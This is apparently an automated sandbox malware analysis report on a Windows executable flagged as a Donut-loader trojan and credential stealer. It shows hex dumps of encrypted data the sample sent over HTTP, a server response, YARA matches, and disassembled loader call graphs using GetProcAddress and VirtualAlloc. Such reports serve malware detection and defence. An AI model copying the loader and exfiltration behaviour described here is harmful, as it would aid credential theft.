              Data Ascii: %qi a>(XVVCy3F-n(zQ't%0%}t?`%=:LjD)UMVr?.)8t:>8)'cMlx?GB,`M2!OqTqJvOe*t[Jz:"~^[]d.>v8K9;A.;O@U.?)^K(j.*VX
              2024-07-27 09:25:14 UTC15331OUTData Raw: be c1 fd 6e 22 ad 01 e2 23 78 97 68 98 c3 c7 de 4e f6 e4 23 1f 94 32 40 30 5d d5 31 2e 8e 39 f2 cf 0a 2d 33 04 c2 0d ee 8b e6 6e da c6 61 35 58 67 30 39 e7 69 2f 31 5e 87 e6 73 83 45 b0 83 1b ce 9c cc 24 7e e3 5f b2 81 68 0a 69 dd ee 24 d5 f4 53 46 1a bb 45 32 ac 77 c0 cd 85 98 be 26 e0 85 15 24 9e 0a f9 cd c4 c3 8c 8e c3 39 3c 7f 47 5f 40 07 88 6e ff aa 60 97 b7 24 93 9a 38 d6 00 ec 64 fe e1 12 d7 c5 64 0d 66 26 c7 ef 70 43 de 64 dc 39 70 21 6e a1 bb de 3a f9 39 79 70 fa 4c a6 29 98 7d 60 ac 96 a2 1a 15 e1 29 d0 6b 8c e5 94 47 a0 14 69 33 03 c1 26 8c 3c 37 f7 83 d7 c2 49 6f e4 e2 76 e6 ab 09 c3 ae 4c f1 15 fe 93 38 5f fa 77 64 2b 43 4a f0 32 86 13 c0 a4 a0 32 41 e7 b4 5f 2d c6 02 d2 3f 2f 61 25 5e ac 67 47 e1 b2 74 c2 e7 25 ae 1e 7b 46 c7 88 9a 50 55 11
              Data Ascii: n"#xhN#2@0]1.9-3na5Xg09i/1^sE$~_hi$SFE2w&$9<G_@n`$8ddf&pCd9p!n:9ypL)}`)kGi3&<7IovL8_wd+CJ22A_-?/a%^gGt%{FPU
              2024-07-27 09:25:14 UTC15331OUTData Raw: 84 84 b4 0e 78 1d 84 c1 a2 ff 20 62 6b fc 79 39 cc 6e d9 d2 6a ab fc 41 1a 86 72 00 03 26 f4 69 8e bf 80 a2 1b 5b b1 1a 78 75 8b 51 84 03 82 5b 36 cb a1 eb bf b9 17 82 c7 be 64 65 5e 0b 3e d2 ec dc 88 6d cd ba a8 8b dd b8 ac 9e ea 87 be c7 1d a4 32 c4 db 9a 17 35 7b e5 f4 ce 63 dd 1d bd 7f 29 87 e8 ca 0f 41 dd 38 76 2a eb 26 41 08 cc c4 12 49 da cf c2 ba ff a7 25 41 3e 52 ee 59 33 9b 6f d7 fb d5 96 72 8e 5f 5c 24 bf fd a8 c1 e4 03 07 d9 74 90 01 07 af ff 54 ed ff f8 76 c9 53 ac 4a 99 a9 63 7d ae 46 9a 90 f6 0f 49 8b 73 59 a0 ff f6 be 71 52 53 e4 87 fa 7d 2a 49 58 90 6d 2e 73 96 d7 a4 19 f9 cd 0f 89 b4 ba df 98 55 00 bc f5 c6 eb 3e ea 12 6e 28 5a 67 d6 6a 58 91 84 1f 6d 59 5e a4 34 69 23 1f 4f 60 56 c4 ae 07 e2 38 8d 14 0f 5d 11 96 71 08 4b 16 76 1d ad d5
              Data Ascii: x bky9njAr&i[xuQ[6de^>m25{c)A8v*&AI%A>RY3or_\$tTvSJc}FIsYqRS}*IXm.sU>n(ZgjXmY^4i#O`V8]qKv
              2024-07-27 09:25:14 UTC15331OUTData Raw: cf 8c fe 77 ea 64 9e c3 a7 30 9e 03 ce a7 2a 2d db 56 63 70 bd 4f 4d df f2 54 50 a2 9d d9 bf e9 a0 c6 8f 25 38 d7 c8 00 d7 51 d8 71 84 cd 36 19 90 64 85 fc cd b1 c4 a9 09 3c c6 ba 50 d5 02 c0 a0 f9 9a 1c 74 f1 15 94 15 ba 72 2c ab 55 82 e8 81 e0 d1 04 db 52 cd 9c 63 5a 62 e1 0a d2 e7 ae ec 6d 69 f1 82 e9 39 d9 a5 f0 82 04 7c 6b 33 e3 4f 6d 42 6b 32 89 93 cb 8f 8d d0 d2 83 4c ce 71 91 84 d0 21 a7 c5 72 ae 33 ba 74 5d c4 42 af 0a ed ef 2f bf 5e a7 4c 93 e8 87 8a 05 93 f0 ca b0 2e 1e 52 df f9 eb 9c ca e2 7b 71 95 93 47 f1 fb 3f 57 60 9c 28 34 c3 76 05 4b 68 f1 d8 55 16 87 0c 57 f7 0c d2 cc 5c 98 aa c7 73 bc c9 61 d5 84 a6 3f 36 d4 cf 1f 6e ef 2a 3b 50 60 3b 08 c3 b6 65 b8 ab 4c 20 5f 5e 6a f3 62 b4 75 64 dd 25 a6 ec 0a df 43 74 0e f1 36 0c f2 1f 7d 6d a6 29
              Data Ascii: wd0*-VcpOMTP%8Qq6d<Ptr,URcZbmi9|k3OmBk2Lq!r3t]B/^L.R{qG?W`(4vKhUW\sa?6n*;P`;eL _^jbud%Ct6}m)
              2024-07-27 09:25:14 UTC15331OUTData Raw: 35 70 78 b2 f1 d0 ed 6c 9b 8d 97 d7 99 f9 57 38 1e 5b ce 39 9a e2 1f 02 3b 49 3b eb 81 df d0 f6 31 34 b7 d0 2e 40 4f 82 6c 2e c2 be a3 e8 e5 3c 67 a8 98 ef 23 a0 f7 ec bc 7d 8a 58 29 7a 80 76 3d 55 52 d6 9d a6 b6 48 59 78 95 e2 c1 1a f7 87 23 04 f3 c8 37 c5 e5 6d d8 67 a2 31 d6 62 98 d6 eb 39 54 dd 91 93 51 2c 17 18 b9 2e 2e c3 11 a2 5c be cb 42 43 a3 11 80 89 40 cc dc 08 65 e5 a1 41 66 bd 24 38 c8 3a 59 5d f5 c7 ca 46 27 85 85 96 ef 02 b9 0e 1f de 5f 7d 49 60 1d 87 93 ef 6b 50 04 60 3c 5b e4 c9 09 86 dd 01 e4 6a 19 44 8f 81 12 21 e6 45 11 de c2 b8 b0 a1 4d 50 ad 3e 88 0c bb be e8 e4 bb 71 29 d1 e9 50 11 8c 2e cd 7d 89 e6 be 4a 5e 3b 95 10 c6 bc 70 b4 db 98 49 dc dd 4e 27 d9 09 d6 a0 17 3a ce a7 f1 4f f8 c0 76 b1 3e bf 4f 90 05 b0 46 a1 cb f2 84 94 3b 2a
              Data Ascii: 5pxlW8[9;I;14.@Ol.<g#}X)zv=URHYx#7mg1b9TQ,..\BC@eAf$8:Y]F'_}I`kP`<[jD!EMP>q)P.}J^;pIN':Ov>OF;*
              2024-07-27 09:25:14 UTC15331OUTData Raw: 06 24 d9 9c 4d 7b 72 32 9c 6f 97 70 ef 2b 27 5f b8 ed 01 44 cc 59 ca 53 a4 79 a4 0e fd c8 7a db c1 12 48 a8 bf d0 9b a3 82 50 39 ca bd 63 75 c6 e6 09 83 7c 60 27 7d da a2 6d b5 52 15 f5 ee 21 2b 4c 60 21 42 70 49 28 6d e5 38 71 d7 ca 25 54 ba a3 c4 38 1f cf ac d4 e4 74 73 1e 1c 23 57 7e 1d c6 f2 e1 1a 9f 50 4c 69 fc c0 b7 35 ad 15 f6 42 00 b7 e0 99 bf 3b 15 fd 96 39 85 a8 63 93 98 d5 ea f9 6a fe f3 37 33 a2 dc 37 8a 4e 10 0e ac e3 53 c2 20 34 df 64 22 3f 81 fa f5 61 93 12 e2 b8 68 12 05 8b 8b a7 f3 a4 1d 08 01 0c 0c e6 e7 81 e8 65 80 c6 7a 7a c0 c6 8f 0d d0 a7 76 fd 0a fc a4 a5 ca 8c a0 5f a4 87 76 d7 1a e3 66 52 c6 69 fb 74 37 d1 b3 3e f5 4e d4 8d 2f 06 41 2d 06 53 e8 8e 10 9b fd 47 eb 74 5e 26 14 bc ee a8 35 77 86 8b 83 f4 a8 5b 3f 84 43 3e bc 1e b6 1e
              Data Ascii: $M{r2op+'_DYSyzHP9cu|`'}mR!+L`!BpI(m8q%T8ts#W~PLi5B;9cj737NS 4d"?ahezzv_vfRit7>N/A-SGt^&5w[?C>
              2024-07-27 09:25:14 UTC15331OUTData Raw: cc 31 4c 88 ff 30 31 a9 37 86 ec bf ed 93 91 65 05 65 35 df e4 86 50 75 db 27 b1 80 f8 f7 c5 5e 38 e2 85 62 91 40 f2 de 2e 8d 2a 36 df b6 22 d8 b5 a8 88 8e e1 3c 09 e4 47 39 99 29 4e da 1b 33 93 94 68 68 0e e1 3f 06 f0 fc fb 5d 28 41 2d aa fc 82 c3 d9 c2 06 3f 75 a7 6e 4a 6c c6 fa ef c1 5b 18 e3 3f 52 e5 b9 28 5a 37 d9 be cd 99 62 e4 98 46 2c 14 29 06 7e a7 69 64 90 af 2c d1 7f 8f 24 1d 9d c8 ac 62 49 4c 71 4d ba 8e f5 76 a0 2f 73 a3 e9 38 04 d6 fc 08 be 83 7b e6 7a fc e5 79 23 18 ad a1 09 70 e3 78 17 31 9a 58 2c a6 2b d9 cb d8 51 18 f6 fd 6f 8b c7 6c 34 89 ff 88 3c a2 c8 cc 66 f8 10 46 50 7e 66 55 51 84 8f a6 41 46 46 e9 71 de 88 e8 20 15 11 7d 63 f3 bc ad 76 37 5b 26 26 6c ba 27 07 3d 2f b2 05 09 a8 8c 8d de 2b 20 14 bc b9 8d ed b4 6f 21 76 89 cb dd f2
              Data Ascii: 1L017ee5Pu'^8b@.*6"<G9)N3hh?](A-?unJl[?R(Z7bF,)~id,$bILqMv/s8{zy#px1X,+Qol4<fFP~fUQAFFq }cv7[&&l'=/+ o!v
              2024-07-27 09:25:16 UTC804INHTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:16 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=84l1sh2ds9piv5gloc0gq3g3ss; expires=Wed, 20-Nov-2024 03:11:54 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qI0nw5lbXu6f%2Bo50nkyeP0RjeJi1n%2Bzej7XjhaLST883taimGZB3ITigAPGkNhEY1qXO%2BQ0s1gprMvpxmHcc9eXZSqxxQJGJj7Cs4ekZMqnFAnZXrjHg0f5UAHB9ujTzDQIWlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b94be794a41f5-EWR
              alt-svc: h3=":443"; ma=86400


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              System Behavior

              General

              Target ID:0
              Start time:05:24:58
              Start date:27/07/2024
              Path:C:\Users\user\Desktop\rwsNDpQSKZ.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\rwsNDpQSKZ.exe"
              Imagebase:0xc50000
              File size:2'362'184 bytes
              MD5 hash:35E69F7B1869D8E9CF4270B6EC33EF41
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1838828037.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1789467851.0000000003078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1789281360.0000000003060000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:true

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:0%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:100%
                Total number of Nodes:9
                Total number of Limit Nodes:1
                execution_graph 60450 c9ba60 60451 c9ba3d 60450->60451 60451->60450 60452 c9ba8f 60451->60452 60453 c9c028 GetModuleHandleA 60452->60453 60454 c9c057 60453->60454 60455 c9c94c GetProcAddress 60454->60455 60456 c9c965 60455->60456 60457 c9cf2c VirtualAlloc 60456->60457 60458 c9cf75 60457->60458

                Executed Functions

                Function 00C9B9C0 Relevance: 14.0, APIs: 6, Strings: 1, Instructions: 1750librarymemoryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 c9b9c0-c9b9ce 1 c9b969-c9b98d ?SetInt64@CCmmArchiveVarivant@Cmm@@QAEX_J@Z ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z call ce5347 0->1 2 c9b9d0-c9b9d1 0->2 4 c9b9d3 2->4 5 c9b9d5-c9b9dd 2->5 4->5 6 c9b9e2-c9ba20 call cf27eb 5->6 12 c9ba22-c9ba31 6->12 13 c9ba38 12->13 14 c9ba33 call c58eb3 12->14 16 c9ba3d-c9ba8d call cdd2a7 13->16 14->13 20 c9ba8f-c9d34f call c5d1e4 call c98603 call d02ced call ce2fe2 call c58eb3 call cf4fba call c513fe call ca0433 call c98903 call c880ce call c55a77 call cbe4c9 call c645eb call ced256 call c536d6 call c7435e call cb2549 call caff82 call cc2e4d call ca8ff5 call cafd55 call c71e7e call c56397 call ca2abf call c82905 call cf2db7 call c8de89 call cf4462 call d00a3d call c56138 call c7fca0 call c96b88 call c71cf4 call c6cbe4 call ccd5d9 call cbd49a call c98603 call c9e0da call c617a8 call c6fcdd call ce6986 call cd5bdc call cb3f5c call c880ce call ccb75b call c5858c call cae9fb call c75c15 call c89cc9 call c7baa0 call cb0492 call c6a146 call c9b8b5 call c77a74 call c8b742 call cc2f48 call c9ea6b call ce07e7 call ce71c7 call d0050f GetModuleHandleA call cf0051 call c654c2 call d01dac call ca281b call cb44c0 call c7c1b1 call c82905 * 2 call cbbafb call cd93a6 call c7fca0 call c748fe call cb140b call cbf3ba call c599ce call c771ae call cf6022 call c96b88 call cfa2f2 call c92c6f call cd39d4 call c75847 call c936be call c74f92 call cbff87 call c96b88 call cf938f call cbbafb call cc7cee call c66289 call cc632e call cd9bdd call ca3469 call c593e8 call c7ac89 call cc34e6 call c6614b call cfd3ea call c84ef8 call c6f6b4 call cf0d04 call ca0433 call cf7b05 call c7f5a0 call cf679c call cf4880 call c63766 call ce5cfd call c880ce call c64904 call c6667d call c64904 call c90022 call ca5922 call cdded5 call c536d6 call c93c22 call d031e4 call c5a856 call cc46d9 call c96b88 call ce9b8b call ca281b call c66a44 call c6f4c4 call ca7071 call c699b4 call c5d90e call cbe4c9 call c84ef8 call c73b9e call c78f79 call cf0d04 call c5d90e call c55db5 call c880ce call cba471 GetProcAddress call ce595d call c9e0da call cab45b call cae9fb call ce6801 call c6bfdb call cb15b6 call cb96ee call cb65ba call c9b8b5 call caa790 call ccf0c5 call c98603 call cec096 call caf567 call c5cb88 call cba5e2 call cd0991 call c5cdc9 call ce337c call d00ac0 call cd20c8 call d069f5 call c9b8b5 call cf1b65 call c82905 call ccc747 call ccc50b call cc52e1 call c526b4 call c5aa14 call caa713 call cb6326 call c6fde2 call c5e338 call c90022 call cde5fd call d03554 call c7baa0 call cc42b7 call c9e0da call c587df call ceaf14 call cad793 call c63e17 call cf7698 call c57b40 call cb6dc1 call cd0ebc call cc0993 call cb8cb4 call cd19a9 call c78123 call cc46d9 call c7c1b1 call cae29f call d014a5 VirtualAlloc call cf97f5 call cfe1b6 call c9b8b5 call cadbfa call cbf3ba call ce930e call c73a14 call cb68b6 call cd4f8d call cb3a53 call c73a74 call d049a2 call cfee16 call cb774c call ca3fa1 call c650c8 call c62534 call ce2bae call cb140b call ce7176 call cb68b6 call ccc50b call cc2061 call ce9927 call c6755e call ccc747 call c6d508 call cd4f8d call ce5d27 call cb5e76 call cf16ed call cda356 call cec73a 16->20
                APIs
                • ?SetInt64@CCmmArchiveVarivant@Cmm@@QAEX_J@Z.RWSNDPQSKZ(00000000,00000000,?,-00000004,?,00000040,00C860BC), ref: 00C9B979
                • ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,00000000,00000000,?,-00000004,?,00000040,00C860BC), ref: 00C9B981
                • GetModuleHandleA.KERNEL32(?,?,-18944A80,B1A51CAF,00CB00B3,?,00D3CE14,?,?,00CB0FD4,00000000,?,?,00CA8C62,00000000,00000001), ref: 00C9C04C
                • GetProcAddress.KERNEL32(00000000), ref: 00C9C95A
                • VirtualAlloc.KERNEL32(-01A30A38,0004F80C,-0000000166D1C596,-3FAF5AAB), ref: 00C9CF4F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ArchiveCmm@@$AddressAllocAppendArchive@Child@HandleInt64@ModuleNode@ProcTreeV123@@Varivant@Virtual
                • String ID: VgMe
                • API String ID: 3780256328-4206229080
                • Opcode ID: 32561bd35c48385c834120545eca3fbc18d543ae5aed9fef51e371683ab8050c
                • Instruction ID: 7ad37c40af9ccfb3ca839767cfc27baa1316768c31dee281b74c1660e8836ba6
                • Opcode Fuzzy Hash: 32561bd35c48385c834120545eca3fbc18d543ae5aed9fef51e371683ab8050c
                • Instruction Fuzzy Hash: 15C25477D143254B8758EFB5AC4607E3652FFC2314382D23EE902CB666CF38454AE6A6
                Function 00C9BA60 Relevance: 10.4, APIs: 4, Strings: 1, Instructions: 1699librarymemoryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 475 c9ba60-c9ba6f 476 c9ba75-c9ba8d call cdd2a7 475->476 478 c9ba3d-c9ba5e 476->478 479 c9ba8f-c9c95a call c5d1e4 call c98603 call d02ced call ce2fe2 call c58eb3 call cf4fba call c513fe call ca0433 call c98903 call c880ce call c55a77 call cbe4c9 call c645eb call ced256 call c536d6 call c7435e call cb2549 call caff82 call cc2e4d call ca8ff5 call cafd55 call c71e7e call c56397 call ca2abf call c82905 call cf2db7 call c8de89 call cf4462 call d00a3d call c56138 call c7fca0 call c96b88 call c71cf4 call c6cbe4 call ccd5d9 call cbd49a call c98603 call c9e0da call c617a8 call c6fcdd call ce6986 call cd5bdc call cb3f5c call c880ce call ccb75b call c5858c call cae9fb call c75c15 call c89cc9 call c7baa0 call cb0492 call c6a146 call c9b8b5 call c77a74 call c8b742 call cc2f48 call c9ea6b call ce07e7 call ce71c7 call d0050f GetModuleHandleA call cf0051 call c654c2 call d01dac call ca281b call cb44c0 call c7c1b1 call c82905 * 2 call cbbafb call cd93a6 call c7fca0 call c748fe call cb140b call cbf3ba call c599ce call c771ae call cf6022 call c96b88 call cfa2f2 call c92c6f call cd39d4 call c75847 call c936be call c74f92 call cbff87 call c96b88 call cf938f call cbbafb call cc7cee call c66289 call cc632e call cd9bdd call ca3469 call c593e8 call c7ac89 call cc34e6 call c6614b call cfd3ea call c84ef8 call c6f6b4 call cf0d04 call ca0433 call cf7b05 call c7f5a0 call cf679c call cf4880 call c63766 call ce5cfd call c880ce call c64904 call c6667d call c64904 call c90022 call ca5922 call cdded5 call c536d6 call c93c22 call d031e4 call c5a856 call cc46d9 call c96b88 call ce9b8b call ca281b call c66a44 call c6f4c4 call ca7071 call c699b4 call c5d90e call cbe4c9 call c84ef8 call c73b9e call c78f79 call cf0d04 call c5d90e call c55db5 call c880ce call cba471 GetProcAddress 476->479 478->475 754 c9c960-c9cf27 call ce595d call c9e0da call cab45b call cae9fb call ce6801 call c6bfdb call cb15b6 call cb96ee call cb65ba call c9b8b5 call caa790 call ccf0c5 call c98603 call cec096 call caf567 call c5cb88 call cba5e2 call cd0991 call c5cdc9 call ce337c call d00ac0 call cd20c8 call d069f5 call c9b8b5 call cf1b65 call c82905 call ccc747 call ccc50b call cc52e1 call c526b4 call c5aa14 call caa713 call cb6326 call c6fde2 call c5e338 call c90022 call cde5fd call d03554 call c7baa0 call cc42b7 call c9e0da call c587df call ceaf14 call cad793 call c63e17 call cf7698 call c57b40 call cb6dc1 call cd0ebc call cc0993 call cb8cb4 call cd19a9 call c78123 call cc46d9 call c7c1b1 call cae29f call d014a5 479->754 867 c9cf2c-c9cf70 VirtualAlloc call cf97f5 754->867 869 c9cf75-c9d292 call cfe1b6 call c9b8b5 call cadbfa call cbf3ba call ce930e call c73a14 call cb68b6 call cd4f8d call cb3a53 call c73a74 call d049a2 call cfee16 call cb774c call ca3fa1 call c650c8 call c62534 call ce2bae call cb140b call ce7176 call cb68b6 call ccc50b call cc2061 call ce9927 call c6755e call ccc747 call c6d508 call cd4f8d 867->869 923 c9d297-c9d2b0 call ce5d27 869->923 925 c9d2b5-c9d34f call cb5e76 call cf16ed call cda356 call cec73a 923->925
                APIs
                • GetModuleHandleA.KERNEL32(?,?,-18944A80,B1A51CAF,00CB00B3,?,00D3CE14,?,?,00CB0FD4,00000000,?,?,00CA8C62,00000000,00000001), ref: 00C9C04C
                • GetProcAddress.KERNEL32(00000000), ref: 00C9C95A
                • VirtualAlloc.KERNEL32(-01A30A38,0004F80C,-0000000166D1C596,-3FAF5AAB), ref: 00C9CF4F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: AddressAllocHandleModuleProcVirtual
                • String ID: VgMe
                • API String ID: 3695083113-4206229080
                • Opcode ID: b96f376e3c5e72d3016ff8287a0c2fb73147e576708d29770e8161bb1dfca229
                • Instruction ID: 5c9657955bc05174463dc012e4ebc441b49fab407aa3d270106b9fae6326b864
                • Opcode Fuzzy Hash: b96f376e3c5e72d3016ff8287a0c2fb73147e576708d29770e8161bb1dfca229
                • Instruction Fuzzy Hash: ABB24277D143254B8358EFB5AC4607E3652FFC2314386D23EE902CB666CF38454AE6A6

                Non-executed Functions

                Function 00CDE020 Relevance: 56.5, APIs: 13, Strings: 19, Instructions: 470libraryloaderfileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2198 cde020-cde05e call ce5365 call cdcac4 call cdcb6e 2205 cde060-cde07e call ce1e2c call cdcb8e call cdbfe5 2198->2205 2206 cde083-cde09c call cdcb6e 2198->2206 2205->2206 2212 cde124-cde156 call ce1f27 call cdcb8e call cdbfe5 2206->2212 2213 cde0a2-cde0f5 call ce1f27 call cdcf54 call ce2219 call cdcb8e call cdbfe5 2206->2213 2228 cde16d-cde171 2212->2228 2229 cde158-cde15e 2212->2229 2242 cde115-cde11f call cdbfe5 2213->2242 2243 cde0f7-cde108 call cdcac4 call cdbfe5 2213->2243 2233 cde17e-cde1bd call cdc00b call cdce9e call cdd6ba call cdcc86 2228->2233 2234 cde173-cde179 call cdcb6e 2228->2234 2229->2228 2232 cde160-cde16b call cdcac4 2229->2232 2244 cde10d-cde110 2232->2244 2258 cde1bf-cde1c8 call ce1f95 2233->2258 2259 cde1ca-cde1d2 call cdcc2e 2233->2259 2234->2233 2242->2212 2243->2244 2247 cde514-cde519 call ce5333 2244->2247 2264 cde1d6-cde215 call cdcb8e call cdbfe5 call cdcbea call ce0c75 2258->2264 2259->2264 2273 cde217-cde221 2264->2273 2274 cde223 2264->2274 2273->2274 2275 cde226-cde235 call cdbfe5 2273->2275 2274->2275 2278 cde23f-cde274 call ce0c20 CreateFileW call cdbfe5 2275->2278 2279 cde237-cde23a call ce0cdb 2275->2279 2285 cde286-cde294 CloseHandle 2278->2285 2286 cde276-cde281 call cdcac4 2278->2286 2279->2278 2287 cde296-cde2a0 call cdcb6e 2285->2287 2288 cde2a2-cde2c8 call ce0bc6 call cdcb8e call cdbfe5 2285->2288 2295 cde4fb-cde511 call cdbfe5 * 2 2286->2295 2296 cde2cd-cde2fb call ce0e1e call ce2106 call cf10dd 2287->2296 2288->2296 2295->2247 2310 cde2fd-cde30e call cdcac4 2296->2310 2311 cde313-cde31d 2296->2311 2318 cde4f0-cde4f6 call cdbfe5 2310->2318 2313 cde31f-cde328 call ce1f95 2311->2313 2314 cde32a-cde332 call cdcc2e 2311->2314 2321 cde336-cde372 call cdcb8e call cdbfe5 call cdcbea call ce0c75 2313->2321 2314->2321 2318->2295 2331 cde374-cde381 2321->2331 2332 cde383 2321->2332 2331->2332 2333 cde386-cde395 call cdbfe5 2331->2333 2332->2333 2336 cde39f-cde3c5 call ce0c20 LoadLibraryW call cdbfe5 2333->2336 2337 cde397-cde39a call ce0cdb 2333->2337 2343 cde3c7-cde3e9 call cdd28e call cdd095 LoadLibraryW 2336->2343 2344 cde3f2-cde411 call ce0e1e FreeLibrary call ce2016 2336->2344 2337->2336 2343->2344 2353 cde3eb-cde3f0 2343->2353 2354 cde41e-cde425 2344->2354 2355 cde413 2344->2355 2356 cde418-cde419 2353->2356 2357 cde467-cde46c call cdcb6e 2354->2357 2358 cde427-cde465 call cdc00b call cdce9e call ce20a0 call cdd6ba call cdbfe5 2354->2358 2355->2356 2360 cde569-cde56f call cdcac4 2356->2360 2362 cde471-cde4ca GetCurrentProcessId call cdcf54 * 2 call ce0eab call cdbfe5 2357->2362 2358->2362 2368 cde4df-cde4e2 2360->2368 2385 cde51c-cde538 call cdbfe5 call ce014e 2362->2385 2386 cde4cc-cde4da call cdcac4 call cdbfe5 2362->2386 2372 cde4e5-cde4eb call cdbfe5 2368->2372 2372->2318 2385->2368 2394 cde53a-cde562 call cdec9f 2385->2394 2386->2368 2397 cde574-cde57e call cded81 2394->2397 2398 cde564 2394->2398 2401 cde587-cde596 LoadLibraryW 2397->2401 2402 cde580-cde585 2397->2402 2398->2360 2403 cde598-cde5b9 GetProcAddress * 2 2401->2403 2404 cde5f0-cde606 call cdcac4 2401->2404 2402->2360 2405 cde5e9-cde5ea FreeLibrary 2403->2405 2406 cde5bb-cde5bd 2403->2406 2404->2372 2405->2404 2406->2405 2408 cde5bf-cde5d3 ?Unlock@CState@Cmm@@QAEXXZ 2406->2408 2408->2405 2411 cde5d5-cde5e1 ?Unlock@CState@Cmm@@QAEXXZ 2408->2411 2411->2405
                APIs
                • __EH_prolog3.LIBCMT ref: 00CDE027
                  • Part of subcall function 00CDCAC4: EnterCriticalSection.KERNEL32(00DFFB90,00000000,?), ref: 00CDCADF
                  • Part of subcall function 00CDCAC4: GetCurrentThreadId.KERNEL32 ref: 00CDCAE5
                  • Part of subcall function 00CDCAC4: LeaveCriticalSection.KERNEL32(00DFFB90,?,00000000,?,?), ref: 00CDCB3D
                  • Part of subcall function 00CE1E2C: __EH_prolog3_GS.LIBCMT ref: 00CE1E36
                  • Part of subcall function 00CE1E2C: GetModuleFileNameW.KERNEL32(00000000,?,00000100,0000021C,00CDE068,?,00000028,00CDCA03,?,?,?,?,?,?,?,?), ref: 00CE1E61
                  • Part of subcall function 00CDBFE5: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(144E8D40,F7F48D8D,00CDCB1F,00CDD788,00DFFB90,000762E8,00CDCB1F,00DFFB90,?,?,?,00CDCB1F,00DFFB90,?), ref: 00CDBFFE
                  • Part of subcall function 00CE1F27: __EH_prolog3.LIBCMT ref: 00CE1F2E
                  • Part of subcall function 00CE1F27: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000104,00000000,00000008,00CDE12E,?,?,00000028,00CDCA03,?,?,?,?,?), ref: 00CE1F6C
                • CreateFileW.KERNEL32(00000000,00120089,00000001,00000000,00000003,00000000,00000000,?,?,zCrashReport.exe,00000000,00000000,00000000,?,?,?), ref: 00CDE25E
                • CloseHandle.KERNEL32(00000000,?,zCrashReport.exe,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE287
                • LoadLibraryW.KERNEL32(00000000,?,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE3B0
